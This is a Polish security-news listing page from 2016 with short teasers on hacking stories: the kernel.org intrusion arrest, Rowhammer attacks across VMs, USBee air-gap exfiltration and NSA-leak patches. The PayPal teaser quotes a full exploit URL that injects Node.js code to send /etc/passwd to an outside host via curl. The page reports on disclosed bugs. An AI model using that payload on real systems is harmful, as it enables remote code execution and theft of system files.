Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Aktualności

Hacker, który przejął kernel.org aresztowany. Grozi mu 40 lat więzienia oraz $ 2 000 000 kary

03 września 2016, 11:51 | W biegu | komentarzy 8

W USA aresztowano 27-latka, któremu postawiono zarzuty shackowania w sumie 4 serwerów należących do Linux Kernel Organization: he is alleged to have gained unauthorized access to the four servers by using the credentials of an individual associated with the Linux Kernel Organization. According to the indictment, Austin used that access…

Czytaj dalej »

Automatyzacja OSINT dla darkwebu (deanonimizacja ukrytych serwisów, wizualizacje, itp)

03 września 2016, 11:41 | W biegu | 1 komentarz

Kilka ciekawych wpisów (z dostępnym kodem w pythonie) pokazujących jak automatycznie namierzać ciekawe zasoby w darkwebie – od mapowania kluczy publicznych ssh, przez wykorzystanie shodana, skanowanie domen .onion,  po wizualiację:   Z ciekawostek, autor przygotował też choćby skrypty w pythonie, robiące OSINT już w normalnym webie – np. wykrywające zdjęcia…

Czytaj dalej »

Pięćdziesiąty numer magazynu „Programista” z tekstem od nas

02 września 2016, 13:24 | W biegu | 0 komentarzy

W tym numerze, z naszej strony Michał Bentkowski dzieli się tekstem o tym, jak w prosty i niedrogi sposób szybko zwiększyć bezpieczeństwo swojej aplikacji webowej. Sami wydawcy z kolei piszą tak: Jubileuszowe pięćdziesiąte wydanie „Programisty” jest wydaniem rozszerzonym, co oznacza, że w tym miesiącu znajdziecie w nim jeszcze więcej artykułów…

Czytaj dalej »

Szkolenie Michała Bentkowskiego z bezpieczeństwa frontendu aplikacji web – kto się nie zapisze przegra życie ;-)

01 września 2016, 16:31 | W biegu | 1 komentarz

Dzisiaj krótko – o samym szkoleniu z bezpieczeństwa frontendu aplikacji webowych pisaliśmy niedawno… Co poskutkowało tym, że na najbliższą edycję we wrześniu jest już pełna grupa. Kolejne terminy mamy ogłoszone na początek listopada (Kraków) i grudzień (Warszawa), jeśli chcielibyście inne miasta lub może interesowałoby Was szkolenie zamknięte (w siedzibie firmy,…

Czytaj dalej »

Koszmar wirtualizacji – pokazano praktyczny atak umożliwiający zmianę bitów pamięci pomiędzy VMs

01 września 2016, 15:06 | W biegu | 1 komentarz

Jakiś czas temu pisaliśmy o podatności Rowhammer, ale wiele badaczy stwierdziło że ataku się nie da przeprowadzić w kontrolowany  sposób w praktyce. Okazuje się jednak, że praktyczne ataki tego typu jak najbardziej są możliwe i wykorzystuje też opisywany przez nas swego czasu atak kryptograficzny Bit-Flipping: We introduce Flip Feng Shui (FFS), a…

Czytaj dalej »

USBee – czyli jak zmusić zwykły pendrive do transmisji radiowej dowolnych danych

30 sierpnia 2016, 20:22 | W biegu | komentarzy 8

Ciekawy research z Izraela, pokazujący jak można wysyłać dane z komputera, który jest fizycznie odseparowany od innych sieci.  Całość polega na wykorzystaniu odpowiedniego oprogramowania, które potrafi z niemodyfikowanego pendrajwa zrobić nadajnik radiowy. Projekt działa na relatywnie niewielkie odległości i udało się osiągnąć prędkość transmisji rzędu 20-80 bajtów na sekundę. Przykładową instalację…

Czytaj dalej »

PolCAAT 2016 + CCTV live hacking

26 sierpnia 2016, 10:53 | W biegu | 0 komentarzy

Zapraszam na listopadową konferencję PolCAAT, nad którą sekurak objął patronat. Również będzie tam moja prezentacja dotycząca hackowania sprzętu. Jak dobrze pójdzie zobaczycie na żywo hackowanie CCTV – to jeden z efektów które będę chciał pokazać na jednym z bardziej enterprajsowych dostawców kamer: Całość organizuje  Instytut Audytorów Wewnętrznych IIA Polska, a…

Czytaj dalej »

Node.js – wykonanie kodu w OS na serwerze Paypala

20 sierpnia 2016, 10:20 | W biegu | komentarze 3

O problemach bezpieczeństwa w node.js pisaliśmy już jakiś czas temu. Teraz świeży bug umożliwiający wykonanie kodu w os na demo.paypal.com. Tym razem udało się znaleźć problem przy okazji fuzzingu w burpie: Finalnie exploit okazał się w miarę prosty (wysłanie /etc/passwd do serwera atakującego): https://demo.paypal.com/demo/navigation?device[]=x&device[]=y’-require(’child_process’).exec(’curl+-F+”x=`cat+/etc/passwd`”+artsploit.com’)-’ –Michał Sajdak

Czytaj dalej »

Prezent z Chin z … prezentem w postaci wstrzykiwania zewnętrznego JavaScript do komunikacji użytkowników

20 sierpnia 2016, 10:08 | W biegu | komentarze 2

Tym razem bohaterem jest router przywieziony z Chin: Rzadko zdarzają się tak dokładne analizy różnych problemów bezpieczeństwa na urządzeniach sieciowych – tym razem mamy dostęp m.in. dostęp do roota przez podanie odpowiedniej nazwy ciastka + eskalację poprzez wstrzyknięcie do wykonania traceroute. Z ciekawostek – w routerze jest zainstalowany privoxy, potrafiący pozytywnie…

Czytaj dalej »

Łatanie po wycieku z NSA – Fortigate patchuje buga dającego zdalnego admina

18 sierpnia 2016, 16:33 | W biegu | 1 komentarz

Nie tylko Cisco ale również inni producenci  łatają się po ostatnim wycieku ze skackowania NSA. Fortigate zapatchował właśnie w swoich starszych produktach buffer overflow w… parserze ciasteczek. Podatność umożliwia zdalnie otrzymanie uprawnień admina, i oznaczona została priorytetem High. Prawdopodobnie do wykorzystania podatności wystarczy nieuwierzytelniony dostęp do interfejsu webowego urządzenia. Cisco też nie pozostaje…

Czytaj dalej »